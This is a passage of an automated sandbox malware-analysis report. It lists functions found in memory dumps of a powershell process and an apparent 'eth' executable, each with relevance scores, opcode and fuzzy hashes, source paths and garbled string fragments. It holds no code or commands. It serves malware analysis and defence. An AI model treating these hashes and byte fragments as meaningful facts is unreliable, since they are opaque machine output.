                          • Instruction ID: 13caa547e7b58bb2dc850ec35a75787b8e49fdcec197d14009411d7de61db272
                          • Opcode Fuzzy Hash: 434774363e86f0957f8f5912af5dff5506af596da337555e4bda7c6086ac9437
                          • Instruction Fuzzy Hash: AAF0A039710A148FDB00DB68DD40A9977EAEFC875171041D8DA0ACB364EF34DC068B91
                          Function 04BF91C8 Relevance: .0, Instructions: 31COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: be01bc99a45c045934747faa9bc05ede0ab0bea49b9ceef0ebb10d95b0dac7db
                          • Instruction ID: e7f045f6811ef0af0d98e4ddc10bdb0e0a13d5ca7bc1bf4adcfbd273390e3529
                          • Opcode Fuzzy Hash: be01bc99a45c045934747faa9bc05ede0ab0bea49b9ceef0ebb10d95b0dac7db
                          • Instruction Fuzzy Hash: EAF027756042049BE700AF64D0287DB77AADFC5318F10816AC9195B389CF3A6806CBE0
                          Function 04BFDF18 Relevance: .0, Instructions: 31COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 577d67558540cc5cfa86d19b5950361d447357c4ebfdc9e66294589f69411c63
                          • Instruction ID: 62fee0f9bc206812ecd386682f93b87a8242f801bda81945efc9a555111a3e4d
                          • Opcode Fuzzy Hash: 577d67558540cc5cfa86d19b5950361d447357c4ebfdc9e66294589f69411c63
                          • Instruction Fuzzy Hash: 5FF058387042408FC305CF58D9A8C65BBFAEF8A71532A14DAE19ADF736DA61DC02DB50
                          Function 04BF8A4A Relevance: .0, Instructions: 31COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c5da13d072dd52f131bd74e84ecd9481de8b69a5e7c9a049ebc15304b738d70c
                          • Instruction ID: ee066851113c92e869cf2a938a1dc9273ffbf07b2412aff0e1a43f4bb410272b
                          • Opcode Fuzzy Hash: c5da13d072dd52f131bd74e84ecd9481de8b69a5e7c9a049ebc15304b738d70c
                          • Instruction Fuzzy Hash: 6DF0E2353083446BC7062B3498283AD3F65EB86729F06409BD6598B2C3DF654C1A83A5
                          Function 04BFDF28 Relevance: .0, Instructions: 30COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4906641bfc4f92081fb90940f339d68479fc46dec34ec2f0f29ec66873c4e9cc
                          • Instruction ID: adcd5ef8b4758b396e4a7a49d03fbbcd2a2dc1497e2faee7d89c9ac90672f135
                          • Opcode Fuzzy Hash: 4906641bfc4f92081fb90940f339d68479fc46dec34ec2f0f29ec66873c4e9cc
                          • Instruction Fuzzy Hash: DFE0E5357001148F83109F5DD898C26B7FAEFCEB2572910AAF64ACB735DA61EC01DB90
                          Function 04BFB068 Relevance: .0, Instructions: 25COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 77d7d86c79e02c6bc7776b135b942d3c71d51b0ef535907f350e9df189f44291
                          • Instruction ID: 6605c215acb11f4fbef9e419f0e2e13acb5fda7b2ebcec80a29a6abfc00df166
                          • Opcode Fuzzy Hash: 77d7d86c79e02c6bc7776b135b942d3c71d51b0ef535907f350e9df189f44291
                          • Instruction Fuzzy Hash: 09E0DF327083900BCB0AC138AD656616B278BC7B20B09C4FBE688DF2D6DC11980E8350
                          Function 04BF9248 Relevance: .0, Instructions: 25COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8c5135b89f95f3cf13437f4e9adb57c949a773ee20eae143d8ddd7a3ef11eadc
                          • Instruction ID: f72f3ba4332c33ffd11e0293154f5e6647504cfadc2431ea2bdb94307cb799da
                          • Opcode Fuzzy Hash: 8c5135b89f95f3cf13437f4e9adb57c949a773ee20eae143d8ddd7a3ef11eadc
                          • Instruction Fuzzy Hash: E5F0ED749003049BD764DFB9D49879A7BE9EB44350F00486EE65ED7380DB3568948B90
                          Function 04BF8A58 Relevance: .0, Instructions: 24COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8cd059b8491cd892a351dd662a6866e6b5d7bc0da22de81dfededa31106180a4
                          • Instruction ID: a4911aa1b65a0e3a7f404fe3d87adece468c33d95fb9ec574971f9dd9fc8a618
                          • Opcode Fuzzy Hash: 8cd059b8491cd892a351dd662a6866e6b5d7bc0da22de81dfededa31106180a4
                          • Instruction Fuzzy Hash: A4E02635304210A7CB083B78A42C2EE7A5AEBC4724F01002FE72A83382EF38592583D9
                          Function 04BF9630 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ae36fd051dbb61270755223b50bb5ead628434ced74675b6cd75684d83b5e13a
                          • Instruction ID: 1076e0e6c7b41909896f1988121e3481e1bcbd5b2b593777bcf6e993a308470f
                          • Opcode Fuzzy Hash: ae36fd051dbb61270755223b50bb5ead628434ced74675b6cd75684d83b5e13a
                          • Instruction Fuzzy Hash: 7AD05E563001292B176438AA9C107BBA1CFCEC68A9B0611BB9B0CDB241EE40EC0913F2
                          Function 04BFDDC8 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                          • Instruction ID: 87adb7e8b650d68a6127c4da90837fd51d9572eca892b638fd62745aa1f16925
                          • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                          • Instruction Fuzzy Hash: 1DE08631B00014978B089559D8144D9F7AADBCC220F04847ADA4EA7340DE32691987E1
                          Function 04BF9629 Relevance: .0, Instructions: 22COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1f45a47eadb6d9f74c481298bba2829e1a714a05d7bc4deff0f8327183006c72
                          • Instruction ID: 84204a42f5a17c5460f640c295d4f79079bb019aa2696fd67975493fcaedc4f8
                          • Opcode Fuzzy Hash: 1f45a47eadb6d9f74c481298bba2829e1a714a05d7bc4deff0f8327183006c72
                          • Instruction Fuzzy Hash: 54D02B6A7001151F571879B98E107BA51CFCEC145D70214BB870CEB250DE10DC0D03F1
                          Function 04BF88E0 Relevance: .0, Instructions: 21COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 917853470c88980b89a5e81f510c0a2c7b9c10b5d46d8e7e27f0050d93dea249
                          • Instruction ID: a942d106534a9afa23711e284d21d662c864d75ae1e5dc1ba8eb662f27b3da5e
                          • Opcode Fuzzy Hash: 917853470c88980b89a5e81f510c0a2c7b9c10b5d46d8e7e27f0050d93dea249
                          • Instruction Fuzzy Hash: F2E0D830A043499BC704DFA4D456A59BFB4EB45204F008058DE98973C1E6315855CB81
                          Function 04BF8819 Relevance: .0, Instructions: 21COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 882424587e394cdb101b4377de33b52bbd313419467bb2836bbc6dcd2697ed0e
                          • Instruction ID: 50a3cab16c5a42404c520f8e0cb5fe7306dbb90d3f3483ef3bd18fe34423d562
                          • Opcode Fuzzy Hash: 882424587e394cdb101b4377de33b52bbd313419467bb2836bbc6dcd2697ed0e
                          • Instruction Fuzzy Hash: 88E0DF304142469BCF09DFB0E85FABD7F34FB11306F0141AED5A24A2D1EA31164ACB40
                          Function 04BFF540 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a387e8dbc1d9d637ffbb0ccc64ee3443ba76aff1ba137ac59e1ed5ac50c34d67
                          • Instruction ID: 5f0a927ae0276c5d68ff2ff844e665c1bb5c4e2b71aba49ff2fd6718fe56dbd8
                          • Opcode Fuzzy Hash: a387e8dbc1d9d637ffbb0ccc64ee3443ba76aff1ba137ac59e1ed5ac50c34d67
                          • Instruction Fuzzy Hash: 9CE01A70D0424A9FCB80DFBCC845669FFF0EB4A210B6486EEC959E7205E7329651CF81
                          Function 04BFF550 Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                          • Instruction ID: 867c128586e4b1c81a5b87f459796369520d48b6b9d6f9c0c9d64b326a471de4
                          • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                          • Instruction Fuzzy Hash: F2D042B0D042099F8780EFA9894156EFBF4AB48200F6085AA8919E7201E632AA128BD5
                          Function 04BF88F0 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 78f9fe79a17b0fe1695a73749500d7ff1e609210953daf4ba165c5f30b8916f9
                          • Instruction ID: 0571fd8a675051058dfbec7e9a28a30eb79ecc6aceb65444a4c5bc0f98cdd50f
                          • Opcode Fuzzy Hash: 78f9fe79a17b0fe1695a73749500d7ff1e609210953daf4ba165c5f30b8916f9
                          • Instruction Fuzzy Hash: A9D05B34E04309DFC708EFA4E45686EBBB5E744300F004159DE5993380E7305855DFC1
                          Function 04BF8828 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 54b59fdf977fb2aa92e695b13d3e3165469494635f7955a8971c43fe2858fc47
                          • Instruction ID: a7c0fd09e612b97ffcfd9887710e296d9cb9941b63ca7355bc7abc547d2461bb
                          • Opcode Fuzzy Hash: 54b59fdf977fb2aa92e695b13d3e3165469494635f7955a8971c43fe2858fc47
                          • Instruction Fuzzy Hash: 51D067319051099BCB08AFA4E86B4BEBB38FA14301F4151ADDA67522D1EB312A5ACAC1
                          Function 04BF79FA Relevance: .0, Instructions: 14COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ad49ffa86d0665d91ec589e7135d841b6541c82dba046f111bd3539ffd5fae2e
                          • Instruction ID: 2a0bd27bc326afc48596dbaf90524fcddf62fbe8eba88cd7715ef4256a4c15a5
                          • Opcode Fuzzy Hash: ad49ffa86d0665d91ec589e7135d841b6541c82dba046f111bd3539ffd5fae2e
                          • Instruction Fuzzy Hash: 20D09E3418D3C55FC71B8B79949845E7FA06D1311030904FED485CF5A7C666C449CB01
                          Function 04BF7F71 Relevance: .0, Instructions: 13COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9fc85f1f6e42e37d807c286d5afdda924b126c760b31c4ae54308973030550fc
                          • Instruction ID: aa898db78e5e57b4fb3380b93b5375d75c7ddf1f884dd711f32b2b9721068f43
                          • Opcode Fuzzy Hash: 9fc85f1f6e42e37d807c286d5afdda924b126c760b31c4ae54308973030550fc
                          • Instruction Fuzzy Hash: 73C04C255867E56EE34705324C402852FF09C5341034E02FE41C5CF5E7D60DC94F8B91
                          Function 04BF7A08 Relevance: .0, Instructions: 8COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d97d4f755605a25288d2bd7b5e0b887378b59a55122d6ca7c13722c724ffe5a3
                          • Instruction ID: 5e9de9d1a4c6b892063f01486108f1a807c6a0f2d6ff812c959fcd4b46f18655
                          • Opcode Fuzzy Hash: d97d4f755605a25288d2bd7b5e0b887378b59a55122d6ca7c13722c724ffe5a3
                          • Instruction Fuzzy Hash: A3B092340487088FC2086F76A408829732DBA4120578408A8E40E4B6A68E37E841CA44

                          Non-executed Functions

                          Function 08BF3E98 Relevance: 1.6, Strings: 1, Instructions: 373COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2190328303.0000000008BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: Xm^
                          • API String ID: 0-3273323625
                          • Opcode ID: c543510d2bc7aaa31a58c03fb1da1fc6ccbbafe397b866d5d196e5373fc3ddae
                          • Instruction ID: 2c641f18a9ef8ddf143a9825c70c60a47ed678d8391e8143c593543088bedf2d
                          • Opcode Fuzzy Hash: c543510d2bc7aaa31a58c03fb1da1fc6ccbbafe397b866d5d196e5373fc3ddae
                          • Instruction Fuzzy Hash: B5E12D707002059FDB14DF39C944BAABBF5EF48305F10897DD50ADB2A2EB75E94A8B90
                          Function 07A81BE0 Relevance: 20.4, Strings: 16, Instructions: 414COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2181787883.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7a80000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $cBk$4'jq$4'jq$4'jq$4'jq$84Ml$84Ml$tPjq$tPjq$JPl$JPl$JPl$JPl$JPl$rOl$rOl
                          • API String ID: 0-314082401
                          • Opcode ID: 22e994a91fdfe44d27a4ad8fcb763a908d3c299fe306ea7dce861a31c6a00037
                          • Instruction ID: df8ff113b70630947b4fd7f832c1453491df85cc8d78874df4360a7d7bb08d02
                          • Opcode Fuzzy Hash: 22e994a91fdfe44d27a4ad8fcb763a908d3c299fe306ea7dce861a31c6a00037
                          • Instruction Fuzzy Hash: 44D147B2B042498FCB51AB68D4107AABBB6EFC6211F14846FC965CB295DB31CC46C7A1
                          Function 07A83928 Relevance: 12.8, Strings: 10, Instructions: 324COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2181787883.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7a80000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq$$jq$El$El
                          • API String ID: 0-1045847289
                          • Opcode ID: 3796879a0bc6fd698919e2fa3141182d2fd3718a1f04c1e88a96734116ae6e07
                          • Instruction ID: 4c16b7e2e2fe5f3d75bd448632ec8296b7d472c0852b746b31fc7fc74aed98f8
                          • Opcode Fuzzy Hash: 3796879a0bc6fd698919e2fa3141182d2fd3718a1f04c1e88a96734116ae6e07
                          • Instruction Fuzzy Hash: 2AA157B17042159FCF50AB69D810B7EBBB6EFC6A20F14846AD865CB391DA32CC45C361
                          Function 07A83678 Relevance: 8.9, Strings: 7, Instructions: 190COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2181787883.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7a80000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq$$jq$$jq$$jq$El$El
                          • API String ID: 0-2108968551
                          • Opcode ID: fbb3196292d97bbbc84a17249e1efdf9eb5e57fc35b36ed3b7f6da9a6c8d09ba
                          • Instruction ID: 676993f75a72ffdd8c5b2e45bdabef1609a1fe6c7e49f73d2627c0a21a1b556d
                          • Opcode Fuzzy Hash: fbb3196292d97bbbc84a17249e1efdf9eb5e57fc35b36ed3b7f6da9a6c8d09ba
                          • Instruction Fuzzy Hash: 12515CF17043069FCF64AB29881067EFBB6AFC2A61F14807BD465CB251DA35C845CBA2
                          Function 07A82273 Relevance: 7.6, Strings: 6, Instructions: 95COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2181787883.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7a80000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: TcBk$lcBk$JPl$JPl$JPl$JPl
                          • API String ID: 0-3379438071
                          • Opcode ID: 437ae433bcfdca986ed86c8fce5f8113973241216775faca8dd0f04d7ce5d28b
                          • Instruction ID: 125820219018c8858ecb05628ba52d72bde8adcd9cbb37ef0a46df6b8139039c
                          • Opcode Fuzzy Hash: 437ae433bcfdca986ed86c8fce5f8113973241216775faca8dd0f04d7ce5d28b
                          • Instruction Fuzzy Hash: 1D3102F16083919FC3565B284C01A727FB6BFE3710B198497D5A0DF6D2DA309885C3A2
                          Function 04BF7AE8 Relevance: 6.5, Strings: 5, Instructions: 237COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: tMOl$`kq$`kq$`kq$`kq
                          • API String ID: 0-3148330094
                          • Opcode ID: c7560464aeb9142e9d7f8aed8a507541d994aa42d0f49befcbe5cca96abf9c25
                          • Instruction ID: 4ac6c2f98b54bc2092094649ab932f128cb3c58631b8e949f00ee232cb419085
                          • Opcode Fuzzy Hash: c7560464aeb9142e9d7f8aed8a507541d994aa42d0f49befcbe5cca96abf9c25
                          • Instruction Fuzzy Hash: DBB19074E002099FDB54DFA9D980A9DFBF6FF88304F10866AD419AB355EB34A905CF90
                          Function 04BF7AF8 Relevance: 6.5, Strings: 5, Instructions: 234COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: tMOl$`kq$`kq$`kq$`kq
                          • API String ID: 0-3148330094
                          • Opcode ID: 1127ba88d191d2841b9fdd09fa248f47264fc4cf284d74d74518646ebfd9fbad
                          • Instruction ID: 8ea9a9271bc0db6b2567d2506923c65ecd26cab097554e1306d32373c7f951b8
                          • Opcode Fuzzy Hash: 1127ba88d191d2841b9fdd09fa248f47264fc4cf284d74d74518646ebfd9fbad
                          • Instruction Fuzzy Hash: 42B19174E002099FDB54DFA9D980A9DFBF6FF88300F108669D519AB354EB34A905CF90
                          Function 07A81EF8 Relevance: 6.3, Strings: 5, Instructions: 81COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2181787883.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7a80000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$84Ml$tPjq$JPl$JPl
                          • API String ID: 0-3586433588
                          • Opcode ID: 45a8fb980ece9f3ff0f70f136e20152a0062f19289d09d5adcf277be785bc696
                          • Instruction ID: 143ae152743f55688e8815160f57db74b75a342e0ef05bc707cdbaccd0866506
                          • Opcode Fuzzy Hash: 45a8fb980ece9f3ff0f70f136e20152a0062f19289d09d5adcf277be785bc696
                          • Instruction Fuzzy Hash: E3218FB2A0020ADBDB61AF44C441B36F7B2FBC1711F19806BDA359B191C732DC42C6A1
                          Function 07A85798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2181787883.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7a80000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $jq$$jq$$jq$$jq
                          • API String ID: 0-2428501249
                          • Opcode ID: f876f9b47ecd5f6483f5ef26b04c2014755638f7c60556789ac90b803a8e904b
                          • Instruction ID: e04cb1cc4ebc0575daf837370a901891fa25b90c145d364c188863c7c9978aba
                          • Opcode Fuzzy Hash: f876f9b47ecd5f6483f5ef26b04c2014755638f7c60556789ac90b803a8e904b
                          • Instruction Fuzzy Hash: 90216BB1B103069FDBA4BA6A8800B37BBEB9FC1712F24843BED15DB281DD75C8118761
                          Function 04BF4C62 Relevance: 5.1, Strings: 4, Instructions: 53COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: m^$m^$m^$m^
                          • API String ID: 0-3502344340
                          • Opcode ID: b019c1285bcee239446a56293dc005114107dfb422608bfe22c94ac1f3547b99
                          • Instruction ID: bb41bf542bbe21a05443a6c8992a7c175d27adf2a9cc1369b7c334646a2f9c1e
                          • Opcode Fuzzy Hash: b019c1285bcee239446a56293dc005114107dfb422608bfe22c94ac1f3547b99
                          • Instruction Fuzzy Hash: B9110A12A0E3C10FC3075B294AA81D03F71AF63294B5E41EBC5C88F1A7E929A90FC357
                          Function 07A8210B Relevance: 5.0, Strings: 4, Instructions: 50COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2181787883.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7a80000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $jq$$jq$JPl$JPl
                          • API String ID: 0-131527678
                          • Opcode ID: 484543f326070999490905ac1675cb4654fe4289cc4bbc81e2abcf737994dbde
                          • Instruction ID: 1f8a045cda3e64c8d8c9dd25897ada5c0d0c453cae8b7f8e3bf273796e4ffcb5
                          • Opcode Fuzzy Hash: 484543f326070999490905ac1675cb4654fe4289cc4bbc81e2abcf737994dbde
                          • Instruction Fuzzy Hash: 1701D4B26093814FC32316284D106637FBBAFD761072981D7CA94DF2AAC6358C09C3A2
                          Function 07A8030B Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2181787883.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7a80000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq$$jq$$jq
                          • API String ID: 0-1496060811
                          • Opcode ID: cd4c80f9b74803d2c97684de21d5b12d07fcdc54ac6320a5a3eaea931db79fd8
                          • Instruction ID: 5b32b17b3821b53446f587602cb3755eaa9984cf7890be5503419fa243aab15f
                          • Opcode Fuzzy Hash: cd4c80f9b74803d2c97684de21d5b12d07fcdc54ac6320a5a3eaea931db79fd8
                          • Instruction Fuzzy Hash: 6101846134D3965FC32B262858205676F769FC350072940EBC8A0DF297CE158D0AC3A7

                          Executed Functions

                          Function 00007FF6E2781140 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2208149163.00007FF6E2781000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6E2780000, based on PE: true
                          • Associated: 00000004.00000002.2207986054.00007FF6E2780000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000004.00000002.2208298428.00007FF6E278B000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000004.00000002.2208411918.00007FF6E278E000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000004.00000002.2208567914.00007FF6E278F000.00000008.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000004.00000002.2209510531.00007FF6E2C83000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000004.00000002.2209572681.00007FF6E2CBA000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ff6e2780000_eth.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
